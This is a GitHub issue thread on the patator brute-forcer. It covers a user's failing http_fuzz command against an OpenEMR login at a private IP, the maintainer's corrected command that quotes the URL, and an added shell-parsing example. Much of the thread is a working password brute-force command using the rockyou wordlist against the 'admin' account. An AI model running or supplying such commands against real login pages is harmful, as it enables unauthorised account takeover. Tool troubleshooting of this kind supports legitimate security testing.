lanjelot / patator

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
GNU General Public License v2.0

http_fuzz word list "No such file or directory" #164

Closed davehouser1 closed 3 years ago

davehouser1 commented 3 years ago

Problem: patator http_fuzz keeps showing "-bash: 0=/usr/share/wordlists/rockyou.txt: No such file or directory", and I don't understand why.

Expected behavior: patator will use the rockyou.txt word list, brute force just the password while using "admin" for the username each round, and ignore status code 200 from the system each time.

Command:

$ patator http_fuzz url=http://192.168.131.145/openemr/interface/main/main_screen.php?auth=login&site=default \
method=POST \
body='new_login_session_management=1&authProvider=Default&authUser=admin&clearPass=FILE0&languageChoice=1' \
0=/usr/share/wordlists/rockyou.txt \
follow=1 \
accept_cookie=1 \
-x=ignore:code=200

Output:

[1] 365600
bash: 0=/usr/share/wordlists/rockyou.txt: No such file or directory
$ 12:56:50 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.8.3 at 2021-06-06 12:56 EDT
12:56:50 patator    INFO -
12:56:50 patator    INFO - code size:clen       time | candidate                          |   num | mesg
12:56:50 patator    INFO - -----------------------------------------------------------------------------
12:56:50 patator    INFO - 200  358:37         0.030 |                                    |     1 | HTTP/1.1 200 OK
12:56:50 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s

No matter what I try I see two things:

1) bash: 0=/usr/share/wordlists/rockyou.txt: No such file or directory. Not sure if this is related but can't tell if patator is actually using my wordlists. Confirmed that word list exists.
2) Can't tell but it seems patator is not ignoring status code 200.

Burp suite: You can see that when a login is performed many GET requests are sent after the POST. Not sure if I need to craft this http_fuzz a specific way

POST with response: image

Actual page that shows status: image

So the site appears to redirect to a GET request with status code 200 for each request that fails.

What am I doing wrong here?

lanjelot commented 3 years ago

You need to quote & and learn a bit more on how to use bash :)

In the meantime try this:

patator http_fuzz url='http://192.168.131.145/openemr/interface/main/main_screen.php?auth=login&site=default' method=POST body='new_login_session_management=1&authProvider=Default&authUser=admin&clearPass=FILE0&languageChoice=1' 0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=1 -x=ignore:code=200

Good luck
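
The parsing difference behind the fix above, as an added example that is not part of the original thread: an unquoted `&` ends the command and backgrounds it, so the tool receives only the URL up to `auth=login`, and the shell then tries to run `0=...` as a command of its own. `fake_tool` is a hypothetical stand-in that just echoes its arguments; the host and wordlist path are constructed placeholders.

```shell
#!/bin/sh
# Hypothetical stand-in for the real tool: prints one received argument per line.
fake_tool() { for arg in "$@"; do printf '%s\n' "$arg"; done; }

# Constructed command lines (placeholder host and wordlist path).
UNQUOTED="fake_tool url=http://host.example/main_screen.php?auth=login&site=default method=POST 0=/nonexistent/words.txt follow=1"
QUOTED="fake_tool 'url=http://host.example/main_screen.php?auth=login&site=default' method=POST 0=/nonexistent/words.txt follow=1"

# args_seen LINE: parse LINE the way the shell parses typed input and
# print only the arguments fake_tool itself received.
args_seen() {
    # In the unquoted form the shell splits the line at '&':
    #   1. fake_tool url=...?auth=login   (run in the background)
    #   2. site=default method=POST 0=/nonexistent/words.txt follow=1
    #      site= and method= are valid assignments, but a name cannot start
    #      with a digit, so 0=/nonexistent/words.txt is taken as the command
    #      to execute and fails. That error goes to stderr and is dropped here.
    ( eval "$1" 2>/dev/null || true; wait )
}

# argc_seen LINE: number of arguments fake_tool received.
argc_seen() { args_seen "$1" | wc -l | tr -d ' '; }

echo "unquoted: $(argc_seen "$UNQUOTED") argument(s)"
args_seen "$UNQUOTED"
echo "quoted:   $(argc_seen "$QUOTED") argument(s)"
args_seen "$QUOTED"
```

In the unquoted case the stand-in never sees `method=POST`, the `0=` wordlist assignment or anything after it, which is consistent with the single request and empty candidate column in the output posted in the question.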